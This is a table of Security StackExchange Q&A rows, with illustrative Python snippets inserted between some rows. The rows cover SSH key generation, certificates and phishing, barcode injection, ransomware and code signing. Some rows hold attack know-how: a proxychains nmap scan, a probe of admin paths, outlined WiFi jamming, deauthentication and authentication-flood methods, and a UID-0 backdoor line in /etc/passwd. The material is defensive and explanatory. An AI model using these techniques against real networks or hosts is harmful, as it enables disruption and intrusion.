source_id | question | response | metadata
---|---|---|---
143,442 | Most users would simply type ssh-keygen and accept what they're given by default. But what are the best practices for generating ssh keys with ssh-keygen ? For example: Use -o for the OpenSSH key format rather than the older PEM format (OpenSSH 6.5 introduced this feature years ago on 2014-01-30 ) How should one calculate how many rounds of KDF to use with -a ? Should -T be used to test the candidate primes for safety? What -a value to use with this? For the different key types, what are the recommended minimum -b bit sizes? etc... (there are a mind-boggling set of options in the manual page ). | I recommend the Secure Secure Shell article, which suggests: ssh-keygen -t ed25519 -a 100 Ed25519 is an EdDSA scheme with very small (fixed size) keys, introduced in OpenSSH 6.5 (2014-01-30) and made default ("first-preference") in OpenSSH 8.5 (2021-03-03). These have complexity akin to RSA at 4096 bits thanks to elliptic curve cryptography (ECC). The -a 100 option specifies 100 rounds of key derivations, making your key's password harder to brute-force. However, Ed25519 is a rather new key algorithm ( Curve25519's popularity spiked only when it was surmised that other standards had been diluted) and its adoption is not yet universal. Large steps were made in 2018, so we're nearly there, but on older systems or for older servers (like CentOS/RHEL < 7 or Ubuntu < 15.04), you can generate a similarly-complex RSA key with 4096 bits: ssh-keygen -t rsa -b 4096 -o -a 100 (You may need to omit the -o option since it requires OpenSSH 6.5+ and is the default starting in v7.8, at which point it was removed from the ssh-keygen man page. This dictates usage of a new OpenSSH format to store the key rather than the previous default, PEM . Ed25519 requires this new format, so we do not need to explicitly state it given -t ed25519 . A previous man page stated that “the new format has increased resistance to brute-force password cracking.” See this answer for more detail.) Do not consider the other new ECC algorithm called ECDSA . It is considered suspect (it has known weaknesses and since the US government has been involved in its development, it may be compromised beyond that). Ed25519 was developed without any known government involvement. Stay well away from DSA (“ssh-dss”) keys: they're not just suspect, DSA is insecure . | {
"source": [
"https://security.stackexchange.com/questions/143442",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/128750/"
]
} |
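To make the recommendation above concrete, here is a minimal sketch of scripting those flags — assuming `ssh-keygen` is on the PATH; the function name and file path are illustrative, not from the answer:

```python
import subprocess
from pathlib import Path

def generate_key(path: str = "~/.ssh/id_ed25519", rounds: int = 100) -> None:
    """Generate an Ed25519 key with the KDF rounds suggested in the answer."""
    key_file = Path(path).expanduser()
    subprocess.run(
        ["ssh-keygen",
         "-t", "ed25519",    # EdDSA key type recommended above
         "-a", str(rounds),  # KDF rounds: slows offline guessing of the passphrase
         "-f", str(key_file)],
        check=True,          # raise if ssh-keygen exits non-zero
    )

if __name__ == "__main__":
    generate_key()  # ssh-keygen will prompt interactively for a passphrase
```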
143,444 | I read about message integrity using hashing. As I understand it, message integrity means hashing the message content and sending the hash to the recipient; when the recipient gets the message, they hash it again and compare the two hash values. I have one question about that. The file size may be over 100 MB or so, and in my opinion hashing all of it may take too long. So I would like to hash only some fields, such as the file size and creation date. Is that a possible or safe way to do the hashing? | | {
"source": [
"https://security.stackexchange.com/questions/143444",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/78382/"
]
} |
143,530 | I recently almost got caught by a phishing attempt, due to the use of a relatively convincing domain name and valid SSL certificate (specifically this website ). When checking the certificate it turns out it was issued by Let's Encrypt. So I went there and as far as I understand the process to issue a certificate is automated - if you own a domain, you can get a certificate. However, isn't it a security issue and doesn't it go (at least partially) against the point of SSL certificates? Malicious websites can now look legitimate thanks to these certificates, which makes it a lot more likely that they will succeed. In my case I saw the green padlock on the URL and thought that all was good. Now it seems, due to this certificate issuer, users will be expected to click on that padlock and check who issued the certificate (and close the tab if it's from letsencrypt??). So I'm wondering, given the security risk, why do browsers accept this certificate by default? I'm surprised especially that Chrome does given how careful Google is with security. Do they consider that letsencrypt is a good idea? | I think you are misunderstanding what an SSL certificate actually certifies, and what it is designed to protect against. A standard certificate only certifies that the owner of the certificate actually controls the domain in question. So a certificate for g00dbank.com only certifies that the owner controls the g00dbank.com domain. It does not certify that the owner is a bank, that she is good , or that the site is in fact the well known Good Bank Incorporated. So SSL is not designed to protect against phishing. Just because you see the green lock up in the left corner does not mean that everything is well. You also need to verify that you are on the correct website - that you are on goodbank.com (as opposed to the phishy g00dbank.com ) and that goodbank.com is in fact the website of Good Bank Incorporated. To make this easier for the average user, there is something called Extended Validation (EV) certificates. These also verify that you are the legal entity that you claim to be, by requiring you to do some paperwork. Most major browsers highlight them by displaying the name of the owner in the address bar . So to get an EV certificate the phishers at g00dbank.com would have to start a real business (thereby leaving a paper trail), and even then they would probably not get one because their name is too close to a sensitive target. Let's Encrypt does not issue EV certificates. They issue ordinary ones. But the phishers you encountered could have gotten a certificate from anywhere. In fact, as IMSoP points out in comments, the method Let's Encrypt uses is employed by many of the established CAs as well, the only difference being that Let's Encrypt is more efficient and cheaper. So this has nothing to do with Let's Encrypt specifically, and blocking them would solve nothing. | {
"source": [
"https://security.stackexchange.com/questions/143530",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1873/"
]
} |
143,532 | I am learning to use nmap . I am observing that most of the time when running a command like proxychains nmap -sT -PN -n -sV -p 80 XX.XX.XX.XX , I am getting the following output: Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-25 18:11 UTC
|S-chain|-<>-127.0.0.1:9050-<>-162.213.76.45:8080-<>-203.130.228.60:8080-<--timeout
Nmap scan report for XX.XX.XX.XX
Host is up (16s latency).
PORT STATE SERVICE VERSION
80/tcp closed http
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . What I can understand is that the server failed to connect to the third proxy. What I do not understand is: does that mean that nmap packets are going from the second proxy to the target directly, or is the proxychaining failing entirely, with nmap packets being sent directly from my PC and revealing my identity? Note: I'm running the Tor browser, and therefore routing my proxychains through the Tor network. | | {
"source": [
"https://security.stackexchange.com/questions/143532",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/117464/"
]
} |
143,542 | I was watching a defcon video a couple of weeks ago where a guy was demonstrating how barcode readers were generally quite easy to hack. He went on to say things such as with most systems the input isn't sanitised (sounds similar to SQL injection) and that most of them were configurable by bar codes easily obtained by the manufacturer. Combined with the fact that a machine can quickly be configured to read all types of barcodes including the ones that can store in excess of 1000 characters, are barcodes a vulnerability? And how could one prevent this? So far the possible vulnerabilities I can see are SQL injection and buffer overflows. | Yes, barcode scanners present a potential vulnerability. You need to prevent attacks from this vector in the same way you'd prevent attacks from any input vector, such as a network connection or a keyboard. Validate inputs in the app, not the scanner. Do not rely on configuring the scanner to only deliver 12 digit UPC-A barcodes. As every web app developer quickly learns, trusting the client to perform input sanitization is a giant security hole. Use length checks in the app to ensure that buffer overflows can't be exploited. Perform white-listing value checks to make sure you don't have out-of-bounds characters (for example, if you're expecting the user to scan only a product UPC-A or EAN-13 barcode, you should throw an exception if the input detects any non-digit values.) Code defensively. Just as with a web app, you need to make secure coding choices such as parameterized SQL. You should already be doing this to protect against keyboard-entered SQL injection attacks; barcodes are nothing special here. Harden your devices. Most barcode scanners are initially configured by scanning a series of special manufacturer provided barcodes (your scanners' documentation will describe these symbols.) Read the scanners' documentation to find the way to configure the scanners from the host computer via the data connection. Once you can configure the scanners from the computer, do so. Among the configuration items to set, you should disable the scanner's ability to read the configuration barcodes. | {
"source": [
"https://security.stackexchange.com/questions/143542",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126881/"
]
} |
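As a sketch of the validation steps the answer above describes — a whitelist on length and characters in the application, followed by a parameterized query; the table and column names are invented for illustration:

```python
import sqlite3

def validate_barcode(scan: str) -> str:
    """Reject anything that is not a 12-digit UPC-A or 13-digit EAN-13."""
    if len(scan) not in (12, 13):   # length check defeats oversized payloads
        raise ValueError("unexpected barcode length")
    if not scan.isdigit():          # whitelist: digits only, no SQL metacharacters
        raise ValueError("non-digit characters in barcode")
    return scan

def lookup_product(conn: sqlite3.Connection, scan: str):
    code = validate_barcode(scan)
    # Parameterized SQL: the scanned value is never spliced into the query text
    return conn.execute(
        "SELECT name, price FROM products WHERE barcode = ?", (code,)
    ).fetchone()
```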
143,599 | Is it possible that someone mounted an attack (DoS or something else) on my Wi-Fi router (without knowing the password) and made my router's signal unavailable? 1) How can it be done? 2) What are the remedies? | There are a lot of ways you can attack a WiFi without knowing any passwords: Physical layer attacks: Simply jam the frequency spectrum with your own signal. That signal might just be noise, but it might also be a WiFi of your own under heavy load, with the nodes in that WiFi being configured not to play nice with others. (Depending on the WiFi chipset, that can be extremely easy.) Spectrum can only be used once! Tool : noise source (e.g. Gunn Diode, SDR device ), or normal AP Electromagnetic sledgehammer: EMI gun. Take a microwave oven oscillator, attach a directive antenna, pray you don't cook someone's (your) brain, and point in the rough direction of the access point. Poof! Microwave ovens operate in the 2.4 GHz band, and thus, antennas of Access Points are picking up exactly that energy. Tool : Microwave oven, some sheet metal, lack of regard for other people's property and your own health, or extended RF knowledge MAC and Network layer attacks: Especially for networks using WEP (no one should be using this anymore, but sadly...) it's easy to forge what are called deauthentication packets – and thus, to throw out stations from your WiFi. Tool : Aircrack-NG's aireplay Targeted jamming: As opposed to simply occupying the channel with noise or your own WiFi, you can also build a device that listens for typical WiFi packets' beginnings (preambles), and then, just shortly, interferes. Or it just sends fake preambles periodically, or especially when it's silent. That way, you can corrupt selected packets, or fake channel occupancy. Tool : Commodity off-the-shelf SDR Authentication attacks: At some point, even "proper" clients for your WiFi need to register with the WiFi. That mechanism can of course be forced to its knees by simply sending hundreds of authentication requests every second, from randomly generated MAC addresses, or even from MAC addresses of clients you know (by observation) exist. There's no solution to the problem for the AP – either it succumbs to the overload of auth packets, or it starts blocking out legitimate users. Tool : your network card, 10 lines of bash scripting Man-in-the-Middling / access point spoofing: With anything short of WPA(2)-Enterprise, nothing proves that the access point calling itself "Toduas AP" is actually your Access Point. Simply operating a slightly higher-powered access point with the same ID string and, if necessary at all, a faked AP MAC address (trivial, since it's just a setting), will "pull" clients away from your access point. Of course, if the spoofing Access Point doesn't know the password, users might quickly notice (or they don't); however, noticing things don't work is nice, but doesn't help them. Tool : a random normal access point You have to realize that it's a privilege, not a right, to have your WiFi use a channel. WiFi happens in the so-called ISM bands (Industrial, Scientific, Medical usage), where operators of transmitters don't have to have an explicit license. That means it's OK for everyone to use that spectrum, as long as they don't intentionally harm other devices and are not easily damaged by interference. So, it's absolutely legal for someone to operate a high-definition digital camera stream that occupies the whole WiFi channel. That will effectively shut down your WiFi.
If you need something that no-one can mess with, wireless is, by definition, not the way to go. | {
"source": [
"https://security.stackexchange.com/questions/143599",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56001/"
]
} |
143,781 | My girlfriend was scammed and entered my home address and my credit card number on a fake website (through a Facebook ad). What risks am I additionally incurring, apart from having lost €40 (the money that was on the card - luckily it is one of those cards that you have to charge in advance to make a purchase)? Is there something especially urgent I have to do? My card's properties: It can only pay out what I first charge into it. It does not allow transfers to my bank account. I chose that card so that I lose at most the money that is in it (even though my bank insisted I choose another type of card instead). | Call the credit card company! They have procedures for this, including blocking your credit card and replacing it. You might even be able to get the €40 back.
There are a lot of articles about this online . If you knowingly ignore the issue you might be liable for any future damages from fraudulent credit card charges. | {
"source": [
"https://security.stackexchange.com/questions/143781",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52239/"
]
} |
143,934 | Long story short I was making sure a web app didn't create an LFI vuln by attempting to open /etc/passwd with it. My first attempt to prevent LFI was unsuccessful and listed out the file, and I noticed this at the bottom: backdoor:x:0:0::/root:/bin/bash What does this mean, and is it malicious? If so, how do I remove it? | Well, from your question I assume you know what a line in /etc/passwd is, so your question strikes me as a bit odd. Unless, of course, you're going through some kind of test and don't really know your way around a Unix system and are trying to pass easily by having us do the work. However: That's a line in /etc/passwd that defines a user called backdoor , which prefers the bash shell. The bad news is (aside from the fact that someone utterly stupid or an author of some kind of admin test used the name backdoor for this user) that this account uses user ID 0 and Group ID 0, and home /root , and all three of those should be absolutely exclusive to root , the super user. Your system has been compromised. You'll need to remove the system from the network, do a postmortem analysis, and set it back up from scratch, hopefully closing the vulnerability you found in your postmortem analysis that allowed them to do this in the first place. (Leaving the system up and trying to "clean it up" is a losing game because who knows what other rootkits or backdoors they have planted). | {
"source": [
"https://security.stackexchange.com/questions/143934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66722/"
]
} |
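Hunting for this class of backdoor is scriptable; a minimal sketch that flags any /etc/passwd entry claiming UID or GID 0 without being root — keeping in mind that on a compromised box a rootkit can lie, so a clean result proves little:

```python
def suspicious_passwd_entries(path: str = "/etc/passwd"):
    """Yield account entries that claim UID/GID 0 but are not root."""
    with open(path) as f:
        for line in f:
            fields = line.rstrip("\n").split(":")
            if len(fields) < 7:
                continue                      # skip malformed lines
            name, uid, gid = fields[0], fields[2], fields[3]
            if (uid == "0" or gid == "0") and name != "root":
                yield line.strip()            # e.g. backdoor:x:0:0::/root:/bin/bash

if __name__ == "__main__":
    for entry in suspicious_passwd_entries():
        print("suspicious:", entry)
```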
144,055 | For the record, I understand that absolutely no service is safe, and "the only way to keep a computer from getting hacked is to never connect it to the network". So, we've got that out of the way. Now, I understand that Dropbox has started encrypting its data-at-rest with 256-bit AES encryption. So, my simple question is, do we still need to encrypt our Dropbox contents with TrueCrypt? Are there any real advantages in terms of security/encryption in using Dropbox? | It does not matter much how the data are encrypted as long as the owner of the data is not the only one in control of the encryption key. This in effect means that data encryption and decryption should only be done at the client and only in a safe environment where only trusted software is running. This is not the case with Dropbox: Dropbox has access to the plain data both from the Dropbox client running on your system and on the server side before encrypting it at rest. Also, Dropbox can decrypt the data whenever they want because they have access to the encryption key. And they will do it for sure and without you noticing when law enforcement requires it. | {
"source": [
"https://security.stackexchange.com/questions/144055",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/73443/"
]
} |
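The "decrypt at the client, keep the key yourself" point boils down to encrypting before the sync client ever sees the file; a sketch using the third-party cryptography package (pip install cryptography) — the file names are placeholders:

```python
from cryptography.fernet import Fernet  # third-party: pip install cryptography

def encrypt_before_upload(src: str, dst: str, key: bytes) -> None:
    """Encrypt locally so the sync provider only ever sees ciphertext."""
    f = Fernet(key)
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        fout.write(f.encrypt(fin.read()))

key = Fernet.generate_key()  # keep this key out of the synced folder!
# encrypt_before_upload("notes.txt", "Dropbox/notes.txt.enc", key)
```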
144,155 | My webserver has been up for < 25 hours and has already been crawled for various default pages, just to name one /administrator/index.php . I understand that this is very common and it's not really an issue for me, as I have secured the server in a decent manner. For the following idea, let's assume I don't care about the resulting traffic. What if I were to create a number of the most requested files, usually representing administrator interfaces or other attack vectors of a common website. The file (e.g. /administrator/index.php ) could look like the following: <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>/administrator/index.php</title>
</head>
<body>
content ^1
</body>
</html> But for the actual body content, I just cram a couple of GB of random strings in there. For example dd if=/dev/urandom bs=10M count=400 | base64 > /tmp/content and then wrap the above HTML tags around the file. What would typical crawlers do on such an event? | You're hurting yourself. The "attacker"/crawler... probably doesn't pay for their traffic or processing power (i.e. they use a botnet, hijacked servers or at least are on a connection that doesn't make them pay for traffic), but you will be billed for traffic and CPU/storage/memory, or your server's hoster has a "fair usage" clause, under which your server's connection will be throttled or cut off if you serve Gigabytes of data in the short term, or your storage bandwidth will be reduced, or your CPU usage limited. Also, why should anyone be so stupid as to download Gigabytes of data when they're just looking for a specific page? Either they're just looking for the existence of that page, in which case the page's size won't matter, or they will definitely set both a timeout and a maximum size – no use waiting seconds for a server to complete a response if you've got hundreds of other servers to scan, and especially not when greylisting is a well-known technology to slow down attackers. | {
"source": [
"https://security.stackexchange.com/questions/144155",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/127732/"
]
} |
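The answer's point about timeouts and size caps is easy to see from the scanner's side; a standard-library sketch in which the cap makes a multi-gigabyte decoy page cost the crawler almost nothing — the URL is a placeholder:

```python
import urllib.request

def probe(url: str, timeout: float = 5.0, max_bytes: int = 65536) -> bytes:
    """Fetch at most max_bytes of a page, then stop reading."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read(max_bytes)  # ignore everything past the cap

# probe("http://203.0.113.5/administrator/index.php")  # placeholder target
```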
144,395 | I am helping a friend who is an accountant and got all of her books locked due to this. Here are some details: BTC address of the attacker: 1MBwkTssJkqRvXmAFcSEZ3xTD39A9rkyYA Email: [email protected] File name example: [email protected] Filename of ransom notice: How to restore files.hta Neither globe nor globe2 could help ("error: reference files missing" after dragging and dropping both an encrypted and non-encrypted file to it at once). Also this thread at Bleeping Computer did not help much. My friend paid 1 BTC to the scammers, after which they sent no key and asked for more money (obviously). Unfortunately, I am not much of a cryptographer, so I am seeking your help to decrypt the files. Edit:
This is what Recuva says ( unable to recover since file x was overwritten by file y.lock ) UPDATE: No solution was found, the person had to format her computer and lose all the data. | I don't think you will see those files again, unless you have a backup. You can view the transaction history of the Bitcoin address you were asked to pay to here . As you can see, there are 303 transactions in total and many of them are for 1 BTC. That implies that the same Bitcoin address has been given to multiple victims. This in turn means that it is impossible for the perpetrators to know who has paid, and what encryption key should be sent. (Hence the odd request for a screenshot, I presume.) So either they are incompetent in their handling of the ransom, or much more likely, they are not restoring any files, instead just milking victims for more and more money. And if they are not restoring any files, why even bother to encrypt them when you can just overwrite them with random garbage? So those files are probably gone, no matter if you pay or not. Edit: There are some good points in comments. Potentially the screenshots could be used as proof of payment, although a flawed one. And even if payment does not lead to decryption the files might still be encrypted. But even with this taken into account, unless a remedy for this specific version of ransomware pops up, you are very unlikely to be able to restore your files. Nkal's answer has a great link to a repository of such remedies. Edit 2: This Troy Hunt blogpost follows a similar line of reasoning about extortion and Bitcoins. Edit 3: The recent WannaCry outbreak has made me reconsider this answer. Apparently WannaCry uses three hardcoded bitcoin wallets , but people still seem to have gotten their files decrypted . So I think the base assumption of this answer is wrong. | {
"source": [
"https://security.stackexchange.com/questions/144395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/125331/"
]
} |
144,428 | According to Apple, with Touch ID the probability of a fingerprint match is 1:50000, while the probability of guessing a four-digit passcode is 1:10000. Statistically speaking, this would make Touch ID five times more secure. But the answer isn't that simple. Reconstructing a fingerprint is far easier than reconstructing a passcode. Although a fingerprint is unique, you are basically walking around with the security key on you at all times. I see having a fingerprint as like having the four digits of a passcode, just not in the right order (is this the right thinking, though?). Regardless, I'm not interested in a passcode. I'm interested in a password . Software applications allow you to log in to social media, online transactions, and even bank accounts. Is a 1:50000 ratio really that secure when compared to a password, especially when looking at such sensitive data? I am more interested in what happens after the attacker has the password or fingerprint, not so much in brute-forcing methods. With a strong password it seems as though the odds are much greater. Although a fingerprint is unique per person, a password is unique per situation. If I have your fingerprint I have your email, your social media accounts, and your bank information. Whereas with a password I may only have your Facebook. Is fingerprint scanning growing rapidly solely because of convenience, or is it more secure for the typical user? Advertisements claim it is more convenient and more secure. However, is this normally the case? | The usability vs. security trade-off isn't resolved by depending on
biometric authorization & authentication. For example, before I start - have a look at how the basic foundation of security is built in matrices: It can be easily concluded that High Security unfortunately comes with low usability features. How Do I know This? I have been doing ongoing research on secure architectural implementation of possible authorization & authentication mechanisms using both iOS & Android. The framework isn't decided & with all the research experience, I have nailed down a few points here which might be worth noting down. Possible Risks If it were to be the primary security protection to access critical
assets, there are intruders who can knock off an individual in
person, chop off his thumb & log in. It could be that simple for
those who keep financial data behind secure login (the primary use case)
procedures. Other threats could involve having the print collected using high-resolution imaging & then applying image-processing techniques to
produce a clone of the thumbprint & use it later, imprinted
on a thin plastic filament. That way there is a second bypass possible
here. Materials used in building a phone might collect prints & afterwards
the specific part can be physically taken apart to have them cloned &
address security bypasses. In contrast to these, a normal password can live only in the user's mind, which solves the problem of physical compromise. All it needs is user awareness of security levels, keeping the password & login strictly within a compliant firm type, e.g. PCI-DSS, etc. (in cases of financial data fraud). There's usability, but then there's security. Hence, more usability will lead to obviously broader security risk surfaces. Therefore, the risk levels of the following biometric factors are worth considering: iris (L) thermogram (L) DNA (L) smell (L) retina (L) veins [hand] (L) ear (M) walk (M) fingerprint (M) face (M) signature (H) palm (M) voice (H) typing (M) Note: H for (High), M for (Medium) & L for (Low) risk. Let's conceptualise the same in matrices as per the basic construct mentioned earlier & see if it matches the criteria: Overall Risk Factors: The physical attack Offer a clean glass of champagne to the target victim during a social
physical event, and manage to recover the glass to get a high
definition picture of the target fingerprints. The storage attack All these fingerprints have to be stored either locally or centrally.
Steal the target victim's phone and, through physical interfaces,
get at the internal content and attack the stored, encrypted
fingerprint. If they are stored centrally, then - since we aren't in a
magic space-time where zero-probability events live - that central storage will
get broken sooner or later. The algorithmic attack As with any other authentication technique, fingerprint reading, storing and
comparing will use algorithms. Hence this authentication is also
exposed to algorithmic attacks. The aforementioned methods have risks. There's an important point about biometric authentication that many of the commercial installations respect, but which is not immediately obvious: Banks should never rely on biometrics to supply both authentication and identification. Biometric measurements are useful, but they're in no wise unique. Two people may not have the exact same fingerprint, hand geometry, or iris patterns, but the measurements are often lossy enough to allow for collisions. Biometrics need to be just one part in a multi-factor authentication system & hence fit best when 2FA & biometrics go side by side. Other Usability Limitations : Aside from these risks, other limitations include the following: Error rate - false accepts and false rejects are still unacceptably high for many types of biometrics. User acceptance - biometrics are still not widely trusted by users; the various privacy concerns are still quite high, and the idea that a part of your body is now a security mechanism still does not sit well with some citizens. The OP's question compares this with traditional passwords - traditional password schemes are less exposed & present a smaller threat surface than the biometric security mechanisms above. Keeping traditional, compliance-friendly passwords as the primary login method & making biometrics an optional extra step after the initial login has been successful - that might be the take-away.
"source": [
"https://security.stackexchange.com/questions/144428",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/116721/"
]
} |
144,466 | I use Linux to store private data and backups for my team because it is said that Linux is itself very secure from malware and doesn't need antivirus. But now ransomware is spreading and has started affecting business PCs that run Windows, so it won't be long before a new variant of ransomware that can affect Linux systems is released - or one might already exist. I don't want to risk our data getting encrypted by ransomware just so someone can collect bitcoins. Do Linux systems now need antivirus for protection against this threat? | There are actually multiple parts of the question: Is Linux affected by malware and especially ransomware? Do antivirus products exist for Linux? Do these products help against this threat? To answer the first: Yes, there is malware for Linux and there is also ransomware. Currently it is usually propagated in a different way compared to Windows: Malware on Windows is mostly distributed by phishing mail and web and makes use of platform-specific vulnerabilities and features, i.e. currently mainly Windows Scripting Host, macros in office documents and vulnerabilities in Office. On Linux systems instead it is usually installed by attacking the server, often by using security issues in WordPress and other CMSes. But this is mainly because server use of Linux is large while desktop use is still rare. The capabilities and vulnerabilities needed to spread ransomware in a similar way to Windows do often exist on Linux too, although some differences (like the need to explicitly set the permissions of executable files) make some exploits harder. As for the second, i.e. whether antivirus products exist for Linux: there are both free products like ClamAV and commercial products available. And finally, do these antivirus products help against malware/ransomware targeting Linux? They mostly don't. These antivirus products care mainly about protecting against attacks targeting Windows and are usually used to scan files or mails which might be served to Windows systems. Thus they are for example useful on a mail server or file server and also on a web server to make sure that the server is not used to spread malware. But they don't even protect fully against attacks targeting Windows. They might have some code in them to detect some well known (and sometimes only proof of concept) malware against Linux but they will not protect against new things. There are also products which scan for traces of existing system compromise and sometimes these are called antivirus but often not. | {
"source": [
"https://security.stackexchange.com/questions/144466",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
144,536 | When studying Dan Boneh's slides for 'Session Management and
User Authentication' (2011), he mentions 'secret salts' on the slide 'Further defences' (slide 48 out of 58). He suggests storing in the database: Alice|SA|H(pwA , SA , rA) In which Alice is the username, SA the salt associated with Alice and H(pwA , SA , rA) the result of hashing Alice's password pwA together with the salt and a small random value rA . I don't understand why adding a short random value r (8 bits) slows the verification down by a factor of 128 while an attacker is slowed by a factor of 256. | This would probably be explained in the audio of the lecture that these slides accompany. My guess is that he's calculating this assuming that users generally enter their correct passwords. You only need to cycle through options for r until you find one that produces a correct hash. If you've been given the correct password, then you will come across an r that produces a correct hash; when exactly this happens will vary (since it's random), but on average you'll go through half the total options (2**8 = 256, 256/2 = 128) before finding it. However, the attacker will usually be trying incorrect passwords. This means they'll have to try every single option of r , which is the full 256. | {
"source": [
"https://security.stackexchange.com/questions/144536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132625/"
]
} |
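A sketch of the scheme from the slides, with the hypothetical names pwA, SA and the 8-bit rA rendered in Python: the verifier returns as soon as one r matches, which is why a correct password costs ~128 hashes on average while a wrong one always costs all 256 (SHA-256 stands in for whatever H the slides intend):

```python
import hashlib, os, secrets

def make_record(password: str):
    salt = os.urandom(16)
    r = secrets.randbelow(256)  # secret 8-bit value, deliberately NOT stored
    h = hashlib.sha256(password.encode() + salt + bytes([r])).hexdigest()
    return salt, h

def verify(password: str, salt: bytes, stored_hash: str) -> bool:
    for r in range(256):        # try every possible secret value
        h = hashlib.sha256(password.encode() + salt + bytes([r])).hexdigest()
        if h == stored_hash:
            return True         # correct password: found after ~128 tries on average
    return False                # wrong password: always all 256 tries

salt, h = make_record("hunter2")
assert verify("hunter2", salt, h) and not verify("wrong", salt, h)
```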
144,551 | As the title says, do those 4 bytes carry a meaning (I assume they do, as apparently the smiley changes depending on the key bitness)? The two files below have been encrypted with different keys, but within the same key those 4 bytes are always the same. If these 4 bytes are always the same, is there any built-in way in PGP/GPG to prevent an attacker from knowing what file they may have obtained/intercepted, other than stripping these bytes in transit and re-creating them at destination? | Yes, those bytes carry meaning - and it's a coincidence that they appear to you as these symbols. They are part of the OpenPGP message format specification ( RFC 4880 ) and vary depending on the packet properties. Let's create a file containing only those bytes and try to read it as a GPG message: $ printf '\x85\x02\x0c\x03' > foo.gpg && gpg --list-packets foo.gpg
# off=0 ctb=85 tag=1 hlen=3 plen=524 :pubkey enc packet: version 3, algo 255, keyid 0AFFFFFFFFFFFFFF
unsupported algorithm 255 The first byte ( 0x85 = 0b10000101 ) is the cipher type byte (CTB) that describes the packet type. We can break it up as follows: 1 : CTB indicator bit 0 : old packet format (see RFC 1991 ) 0001 : public-key-encrypted packet 01 : packet-length field is 2 bytes long The second and third bytes denote the packet length ( 0x020c = 524 ). The fourth byte ( 0x03 ) means it's in the version 3 packet format. As you can see, these bytes are meaningful and not magic number constants that you can remove without losing information. If you cut them off, you are corrupting the GPG packet and it will require some guesswork to reconstruct it. The bytes are shown as smileys and hearts because that's how your (probably DOS) terminal displays non-printable control characters. In character sets that originate from code page 437 , low bytes outside the printable ASCII range are traditionally represented as icons. Here's the original CP437 on an IBM PC: (Image source) | {
"source": [
"https://security.stackexchange.com/questions/144551",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132633/"
]
} |
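The byte-level breakdown above can be reproduced in a few lines; a sketch that decodes only this one case (old-format CTB with a 2-byte length field, per RFC 4880):

```python
def parse_old_ctb(data: bytes):
    """Decode the first bytes of an old-format OpenPGP packet (RFC 4880)."""
    ctb = data[0]
    assert ctb & 0x80, "bit 7 must be set on any CTB"
    assert not ctb & 0x40, "old packet format has bit 6 clear"
    tag = (ctb >> 2) & 0x0F        # 1 = public-key-encrypted session key
    length_type = ctb & 0x03       # 1 = two-byte packet-length field
    length = int.from_bytes(data[1:3], "big") if length_type == 1 else None
    version = data[3]              # packet format version
    return tag, length, version

print(parse_old_ctb(b"\x85\x02\x0c\x03"))  # -> (1, 524, 3), matching gpg's output
```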
144,608 | If so, what are these OSes? Are they specially crafted? How difficult is it to apply this kind of program verification to the everyday OSes we use? If not, why haven't people invented such OSes? Package signature verification is quite common with today's package managers. What I'm asking about is signature verification at loading time. | iOS and Android both validate the signature of every single piece of code before loading it into memory. Windows UWP apps are also all checked for a signature before being loaded. Package signature verification is quite common with today's package managers. What I'm asking about is signature verification at loading time. The difference is massive in terms of performance. A package signature is checked when it is installed and not afterward. To be effective, code signing must be checked for every binary before it is executed or loaded. Furthermore, special care must be taken by the OS (or runtime environment) in order to make sure a memory page marked as executable is signed (or, at least, that it has been loaded from something that was properly signed). That requirement is extremely hard to enforce on any environment that wasn't designed with code signing in mind because it tends to break a lot of legacy code. | {
"source": [
"https://security.stackexchange.com/questions/144608",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96843/"
]
} |
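What "validate the signature before loading" amounts to can be sketched with the third-party cryptography package; this is an illustration under stated assumptions (throwaway Ed25519 keys, a fake blob), not how any of the named OSes actually implement it:

```python
from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.exceptions import InvalidSignature

def load_if_signed(code: bytes, signature: bytes,
                   pubkey: ed25519.Ed25519PublicKey) -> bytes:
    """Refuse to hand back code unless its signature verifies."""
    try:
        pubkey.verify(signature, code)  # raises InvalidSignature on mismatch
    except InvalidSignature:
        raise RuntimeError("refusing to load unsigned/tampered code")
    return code

# Demo with a throwaway key pair (a real OS ships pinned vendor keys)
priv = ed25519.Ed25519PrivateKey.generate()
blob = b"\x7fELF...pretend this is a binary"
sig = priv.sign(blob)
load_if_signed(blob, sig, priv.public_key())
```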
144,635 | Recently, my employer blocked access to Gmail, Yahoo Mail, etc., because an employee downloaded an email attachment which contained ransomware and got their disk encrypted. QUESTION : How does ransomware get the root/admin permissions to encrypt your disk? Presumably, the person who downloaded it had to have entered the admin/root password at some point. | Ransomware doesn't get root/admin permissions, because it does not need to. It does not encrypt the disk or files protected by the operating system (executables, configuration, credentials), it encrypts files created and stored by the users (data); and all it requires to do so, is the same level of access as the users themselves. Just like a user would create a password-protected zip and delete the original file, so does ransomware (except, it keeps the password in secret and makes sure the original file is really inaccessible). That's the whole reason why ransomware is so successful, it encrypts what is the most valuable for users and companies: their work. | {
"source": [
"https://security.stackexchange.com/questions/144635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94605/"
]
} |
